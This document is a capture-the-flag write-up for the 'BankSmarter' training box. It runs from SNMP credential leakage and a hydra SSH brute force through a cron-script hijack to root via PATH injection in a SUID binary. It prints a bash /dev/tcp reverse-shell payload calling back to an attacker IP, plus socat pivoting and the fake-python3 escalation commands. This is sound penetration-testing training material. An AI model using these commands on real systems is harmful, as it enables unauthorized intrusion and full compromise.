Banksmarter
This box is provided by HackSmarter https://www.hacksmarter.org/
Scenario
You are a senior operator on the Hack Smarter Red Team, tasked with a penetration test against a standalone Linux server. Your objective is to gain initial access and escalate privileges to root, emulating a worst-case scenario where a threat actor successfully compromises a critical asset.
You have been given the IP address of the target server and your mission is to gain a foothold, escalate to the root user, and retrieve the final flag from the /root/ directory.
Overview
BankSmarter is a standalone Linux server penetration test simulating a worst-case compromise of a critical banking asset. The attack chain begins with SNMP enumeration leaking credentials, progresses through SSH brute-forcing for initial access, and chains two privilege escalation vectors - a cronjob-based script hijack for lateral movement to a second user, and a PATH injection vulnerability in a SUID binary to reach root.
Attack Summary:
- Recon: TCP/UDP nmap + rustscan → SNMP on UDP 161 leaks a username and password
- Foothold: Username permutation with
namemash+ SSH brute-force withhydra→ shell aslayne - Lateral Movement: Cronjob executes a script in layne's home directory owned by
scott.weiland→ reverse shell asscott;socatunix socket pivot → shell asronnie - Privilege Escalation: SUID binary
bank_backupdhas a PATH injection flaw → root shell
Recon
TCP Port Scan
The engagement begins with a standard nmap scan using -sC (default scripts) and -sV (version detection). Two scans are run in parallel - one targeting common ports and one scanning all 65535 ports to ensure nothing is missed. Output is saved to disk for reference.
sudo nmap -sC -sV -vv -oA tcp 10.0.16.64 && sudo nmap -sC -sV -vv -p- -oA allports 10.0.16.64Rustscan
rustscan is a fast port scanner written in Rust that dramatically speeds up host discovery by scanning all ports rapidly and then handing results off to nmap for deeper analysis. It confirms the open ports identified by nmap in a fraction of the time.
rustscan -a 10.0.16.64UDP Port Scan
TCP scans alone are insufficient - many important services run over UDP. A UDP scan is run with -T4 for speed, targeting the full service range. This is slower than TCP scanning but critical for complete coverage.
nmap -sU -T4 -vv -oA udp 10.0.16.64SNMP Enumeration
The UDP scan reveals port 161 is open - the standard port for SNMP (Simple Network Management Protocol). SNMP is frequently misconfigured and left with the default community string public, which grants read access to a wealth of system information including running processes, network interfaces, installed software, and sometimes even credentials.
snmpwalk is used to recursively query the SNMP tree using SNMP v2c with the default community string:
snmpwalk -c public -v 2c 10.0.16.64The output is extensive. Buried within it are two critical pieces of information - a username and a password - likely exposed through SNMP process table entries or string OIDs that capture command-line arguments of running processes.
Foothold
Username Generation
With a real name extracted from SNMP (e.g., "Layne Stanley"), the next step is generating plausible Linux username formats. Organizations typically follow a naming convention (firstname.lastname, flastname, etc.) and we don't know which one is in use. namemash automates this by generating all common permutations from a name input file:
/opt/namemash/namemash.py users_to_generate > generated_usersThis produces the following candidate list:
laynestanley
stanleylayne
layne.stanley
stanley.layne
stanleyl
lstanley
slayne
l.stanley
s.layne
layne
stanleySSH Brute Force
With a password already in hand and a list of plausible usernames, hydra is used to test every combination against the SSH service. Hydra parallelizes the login attempts, quickly identifying the correct username:
hydra -L generated_users -P pass ssh://10.0.16.64Hydra returns a valid credential pair, granting SSH access to the server.
Post-Exploitation Enumeration with LinPEAS
Once on the box, linpeas.sh (Linux Privilege Escalation Awesome Script) is transferred and executed. LinPEAS performs an automated sweep of the system, checking for misconfigurations, interesting files, SUID binaries, writable directories, running processes, cron jobs, and more. The specific modules run here target the areas most likely to yield privilege escalation paths:
./lp.sh -o system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regexLateral Movement
PATH Injection Discovery
LinPEAS flags interesting files in /usr/local/bin/. Inspecting them reveals a script that calls python3 without using an absolute path - it relies on whatever python3 resolves to via the $PATH environment variable.
This is a classic PATH injection vulnerability. If an attacker can prepend a writable directory to $PATH and place a malicious binary named python3 there, the script will execute the attacker's binary instead of the real interpreter. Since /tmp is writable by all users, this is a viable attack vector.
Cronjob-Based Script Hijack
A script is found in the current user's home directory, but it is owned by another user - scott.weiland. This is suspicious: if a privileged user or cron job executes a script they own that happens to live in another user's home directory, that other user cannot modify it - but they can replace it with a symlink or, if the script is configured to run a file by a name the current user controls, redirect execution.
pspy64 is a process monitoring tool that runs without root privileges and captures all process executions in real time, including those triggered by cron. Running it reveals that the script in the home directory is indeed executed periodically by scott.weiland, and also confirms the /opt/bank/pty_server.py script seen in the SNMP output is running as another user.
# pspy64 is run to passively monitor processesReverse Shell as scott.weiland
Since the script in the home folder is executed by scott.weiland via cron, a reverse shell payload is written in its place. The script connects back to the attacker's listener over TCP:
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.200.41.156/8443 0>&1The script is made executable and placed in the home directory where the cron job expects to find it.
penelope is a feature-rich netcat alternative that provides a more stable and interactive reverse shell experience. A listener is opened on port 8443 and we wait for the cron job to fire:
Pivoting to ronnie via Unix Socket
Once inside as scott.weiland, a .bash_history file is discovered containing previously run commands. This reveals how the internal banking application's socket interface is accessed:
Cross-referencing the history with the files in /opt/bank/, the application exposes a Unix domain socket at /opt/bank/sockets/live.sock. Using socat, it's possible to attach to this socket and interact with the application as the user running it - ronnie:
socat stdio unix-connect:/opt/bank/sockets/live.sockThis provides a shell session in the context of ronnie.
Privilege Escalation
SUID Binary Discovery
From the ronnie context, an SUID binary named bank_backupd is found in /usr/local/bin/. SUID binaries run with the file owner's permissions regardless of who executes them - if owned by root, they execute as root. This makes them high-value targets.
Exploiting PATH Injection in bank_backupd
Inspecting bank_backupd reveals it calls python3 without an absolute path - the same PATH injection flaw identified earlier. Since we now have a shell as ronnie via the socat socket connection, we can exploit this by planting a malicious python3 in /tmp and manipulating $PATH.
The malicious python3 is a copy of the reverse shell script created earlier:
cp /tmp/rev_8443 /tmp/python3
chmod 777 /tmp/python3Triggering Root Shell
With the fake python3 in place, the SUID binary is executed via the socat session, prepending /tmp to $PATH so it takes priority over the real interpreter locations:
socat stdio unix-connect:/opt/bank/sockets/live.sock
PATH=/tmp/ /usr/local/bin/bank_backupdbank_backupd runs as root (SUID), calls python3, which resolves to /tmp/python3 - our reverse shell script. The shell callback arrives on the listener as root:
Root access is achieved. The flag can now be retrieved from /root/.